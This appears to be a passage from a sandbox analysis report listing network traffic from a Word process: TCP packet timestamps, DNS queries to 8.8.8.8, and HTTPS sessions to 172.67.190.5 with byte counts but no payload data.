Jul 21, 2022 14:37:12.328299046 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.328320980 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.328394890 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.328411102 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.328495979 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.328511000 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.328640938 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.328713894 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.328728914 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.328752041 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.328861952 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.328934908 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.328986883 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.329005957 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329056978 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.329087019 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329169035 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329248905 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.329253912 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329277992 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329348087 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.329382896 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329484940 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.329514980 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329598904 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329672098 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.329684019 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329704046 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329755068 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.329782963 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.329947948 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.330025911 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.330039978 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.362432003 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.362540007 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.362556934 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.362596035 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.362607956 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.363131046 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.363234043 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.363253117 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.363274097 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.363327980 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.363338947 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.363369942 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.364379883 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.364499092 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.364518881 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.364598989 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.364640951 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.364656925 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.364698887 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.364706993 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.364804029 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.364814043 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.364872932 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.366107941 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.366230965 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.366231918 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.366252899 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.366312027 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.366326094 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.366350889 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.366429090 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.366456032 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.366539955 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.366559982 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.366638899 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.366662979 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.366739035 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.366749048 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.366767883 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.366826057 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.399553061 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.399683952 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.399705887 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.399746895 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.399807930 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.401339054 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.401454926 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.401480913 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.401510000 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.401546001 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.401565075 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.401633978 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.401648998 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.401691914 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.401760101 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.401772022 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.403552055 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.403651953 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.403678894 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.403703928 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.403773069 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.403784037 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.403810024 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.403872967 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.403883934 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.403924942 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.403985977 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.403996944 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404037952 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404097080 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.404109955 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404139042 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404200077 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.404211044 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404273987 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404337883 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.404347897 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404423952 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404495955 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.404506922 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404608965 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404679060 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.404690981 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404756069 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404818058 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.404829025 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404903889 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.404968023 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.404979944 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405051947 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405107021 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.405117989 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405225039 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405255079 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.405262947 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405292034 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.405292034 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405316114 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.405406952 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405474901 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.405493021 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405518055 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405582905 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.405595064 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405622959 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405709982 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405750036 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.405765057 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.405792952 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.436573982 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.436814070 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.436846018 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.436927080 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.436969995 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.436985016 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.437026024 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.437036991 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.437072039 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.437074900 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.437144995 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.437154055 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.438472033 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.438523054 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.438599110 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.438616991 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.438627958 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.438803911 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.438853979 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.438884020 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.438894987 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.438925982 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.438950062 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.439470053 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.439527988 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.439563036 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.439583063 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.439645052 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.439671040 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.440161943 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440220118 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440274954 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.440287113 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440340996 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.440378904 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.440433025 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440515041 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.440524101 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440541029 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440599918 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.442114115 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 21, 2022 14:34:48.900882959 CEST | 65358 | 53 | 192.168.2.3 | 8.8.8.8 |
Jul 21, 2022 14:34:48.929476023 CEST | 53 | 65358 | 8.8.8.8 | 192.168.2.3 |
Jul 21, 2022 14:34:54.606348991 CEST | 53802 | 53 | 192.168.2.3 | 8.8.8.8 |
Jul 21, 2022 14:34:54.651662111 CEST | 53 | 53802 | 8.8.8.8 | 192.168.2.3 |
Jul 21, 2022 14:37:12.098706007 CEST | 60640 | 53 | 192.168.2.3 | 8.8.8.8 |
Jul 21, 2022 14:37:12.120269060 CEST | 53 | 60640 | 8.8.8.8 | 192.168.2.3 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jul 21, 2022 14:34:48.900882959 CEST | 192.168.2.3 | 8.8.8.8 | 0x939 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jul 21, 2022 14:34:54.606348991 CEST | 192.168.2.3 | 8.8.8.8 | 0x5000 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jul 21, 2022 14:37:12.098706007 CEST | 192.168.2.3 | 8.8.8.8 | 0x8c09 | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jul 21, 2022 14:34:48.929476023 CEST | 8.8.8.8 | 192.168.2.3 | 0x939 | No error (0) | 172.67.190.5 | A (IP address) | IN (0x0001) | ||
Jul 21, 2022 14:34:48.929476023 CEST | 8.8.8.8 | 192.168.2.3 | 0x939 | No error (0) | 104.21.73.122 | A (IP address) | IN (0x0001) | ||
Jul 21, 2022 14:34:54.651662111 CEST | 8.8.8.8 | 192.168.2.3 | 0x5000 | No error (0) | 172.67.190.5 | A (IP address) | IN (0x0001) | ||
Jul 21, 2022 14:34:54.651662111 CEST | 8.8.8.8 | 192.168.2.3 | 0x5000 | No error (0) | 104.21.73.122 | A (IP address) | IN (0x0001) | ||
Jul 21, 2022 14:37:12.120269060 CEST | 8.8.8.8 | 192.168.2.3 | 0x8c09 | No error (0) | 172.67.190.5 | A (IP address) | IN (0x0001) | ||
Jul 21, 2022 14:37:12.120269060 CEST | 8.8.8.8 | 192.168.2.3 | 0x8c09 | No error (0) | 104.21.73.122 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49726 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:49 UTC | 0 | OUT | |
2022-07-21 12:34:49 UTC | 0 | IN | |
2022-07-21 12:34:49 UTC | 1 | IN | |
2022-07-21 12:34:49 UTC | 1 | IN | |
2022-07-21 12:34:49 UTC | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.3 | 49727 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:50 UTC | 1 | OUT | |
2022-07-21 12:34:50 UTC | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
10 | 192.168.2.3 | 49752 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:35:03 UTC | 21 | OUT | |
2022-07-21 12:35:04 UTC | 21 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
11 | 192.168.2.3 | 49753 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:35:06 UTC | 22 | OUT | |
2022-07-21 12:35:07 UTC | 23 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
12 | 192.168.2.3 | 49795 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:37:12 UTC | 24 | OUT | |
2022-07-21 12:37:12 UTC | 24 | IN | |
2022-07-21 12:37:12 UTC | 25 | IN | |
2022-07-21 12:37:12 UTC | 25 | IN | |
2022-07-21 12:37:12 UTC | 27 | IN | |
2022-07-21 12:37:12 UTC | 28 | IN | |
2022-07-21 12:37:12 UTC | 29 | IN | |
2022-07-21 12:37:12 UTC | 31 | IN | |
2022-07-21 12:37:12 UTC | 32 | IN | |
2022-07-21 12:37:12 UTC | 33 | IN | |
2022-07-21 12:37:12 UTC | 35 | IN | |
2022-07-21 12:37:12 UTC | 36 | IN | |
2022-07-21 12:37:12 UTC | 37 | IN | |
2022-07-21 12:37:12 UTC | 39 | IN | |
2022-07-21 12:37:12 UTC | 40 | IN | |
2022-07-21 12:37:12 UTC | 41 | IN | |
2022-07-21 12:37:12 UTC | 43 | IN | |
2022-07-21 12:37:12 UTC | 44 | IN | |
2022-07-21 12:37:12 UTC | 45 | IN | |
2022-07-21 12:37:12 UTC | 47 | IN | |
2022-07-21 12:37:12 UTC | 48 | IN | |
2022-07-21 12:37:12 UTC | 49 | IN | |
2022-07-21 12:37:12 UTC | 51 | IN | |
2022-07-21 12:37:12 UTC | 52 | IN | |
2022-07-21 12:37:12 UTC | 53 | IN | |
2022-07-21 12:37:12 UTC | 55 | IN | |
2022-07-21 12:37:12 UTC | 56 | IN | |
2022-07-21 12:37:12 UTC | 57 | IN | |
2022-07-21 12:37:12 UTC | 59 | IN | |
2022-07-21 12:37:12 UTC | 60 | IN | |
2022-07-21 12:37:12 UTC | 61 | IN | |
2022-07-21 12:37:12 UTC | 63 | IN | |
2022-07-21 12:37:12 UTC | 64 | IN | |
2022-07-21 12:37:12 UTC | 65 | IN | |
2022-07-21 12:37:12 UTC | 67 | IN | |
2022-07-21 12:37:12 UTC | 68 | IN | |
2022-07-21 12:37:12 UTC | 69 | IN | |
2022-07-21 12:37:12 UTC | 71 | IN | |
2022-07-21 12:37:12 UTC | 72 | IN | |
2022-07-21 12:37:12 UTC | 73 | IN | |
2022-07-21 12:37:12 UTC | 75 | IN | |
2022-07-21 12:37:12 UTC | 76 | IN | |
2022-07-21 12:37:12 UTC | 77 | IN | |
2022-07-21 12:37:12 UTC | 79 | IN | |
2022-07-21 12:37:12 UTC | 83 | IN | |
2022-07-21 12:37:12 UTC | 87 | IN | |
2022-07-21 12:37:12 UTC | 88 | IN | |
2022-07-21 12:37:12 UTC | 92 | IN | |
2022-07-21 12:37:12 UTC | 96 | IN | |
2022-07-21 12:37:12 UTC | 100 | IN | |
2022-07-21 12:37:12 UTC | 104 | IN | |
2022-07-21 12:37:12 UTC | 109 | IN | |
2022-07-21 12:37:12 UTC | 113 | IN | |
2022-07-21 12:37:12 UTC | 117 | IN | |
2022-07-21 12:37:12 UTC | 120 | IN | |
2022-07-21 12:37:12 UTC | 124 | IN | |
2022-07-21 12:37:12 UTC | 128 | IN | |
2022-07-21 12:37:12 UTC | 132 | IN | |
2022-07-21 12:37:12 UTC | 136 | IN | |
2022-07-21 12:37:12 UTC | 141 | IN | |
2022-07-21 12:37:12 UTC | 145 | IN | |
2022-07-21 12:37:12 UTC | 149 | IN | |
2022-07-21 12:37:12 UTC | 152 | IN | |
2022-07-21 12:37:12 UTC | 156 | IN | |
2022-07-21 12:37:12 UTC | 160 | IN | |
2022-07-21 12:37:12 UTC | 164 | IN | |
2022-07-21 12:37:12 UTC | 168 | IN | |
2022-07-21 12:37:12 UTC | 173 | IN | |
2022-07-21 12:37:12 UTC | 177 | IN | |
2022-07-21 12:37:12 UTC | 181 | IN | |
2022-07-21 12:37:12 UTC | 184 | IN | |
2022-07-21 12:37:12 UTC | 188 | IN | |
2022-07-21 12:37:12 UTC | 192 | IN | |
2022-07-21 12:37:12 UTC | 196 | IN | |
2022-07-21 12:37:12 UTC | 200 | IN | |
2022-07-21 12:37:12 UTC | 205 | IN | |
2022-07-21 12:37:12 UTC | 209 | IN | |
2022-07-21 12:37:12 UTC | 213 | IN | |
2022-07-21 12:37:12 UTC | 216 | IN | |
2022-07-21 12:37:12 UTC | 220 | IN | |
2022-07-21 12:37:12 UTC | 224 | IN | |
2022-07-21 12:37:12 UTC | 228 | IN | |
2022-07-21 12:37:12 UTC | 232 | IN | |
2022-07-21 12:37:12 UTC | 237 | IN | |
2022-07-21 12:37:12 UTC | 248 | IN | |
2022-07-21 12:37:12 UTC | 253 | IN | |
2022-07-21 12:37:12 UTC | 269 | IN | |
2022-07-21 12:37:12 UTC | 280 | IN | |
2022-07-21 12:37:12 UTC | 296 | IN | |
2022-07-21 12:37:12 UTC | 312 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.3 | 49744 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:53 UTC | 3 | OUT | |
2022-07-21 12:34:54 UTC | 3 | IN | |
2022-07-21 12:34:54 UTC | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.3 | 49745 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:54 UTC | 4 | OUT | |
2022-07-21 12:34:55 UTC | 4 | IN | |
2022-07-21 12:34:55 UTC | 5 | IN | |
2022-07-21 12:34:55 UTC | 5 | IN | |
2022-07-21 12:34:55 UTC | 7 | IN | |
2022-07-21 12:34:55 UTC | 8 | IN | |
2022-07-21 12:34:55 UTC | 9 | IN | |
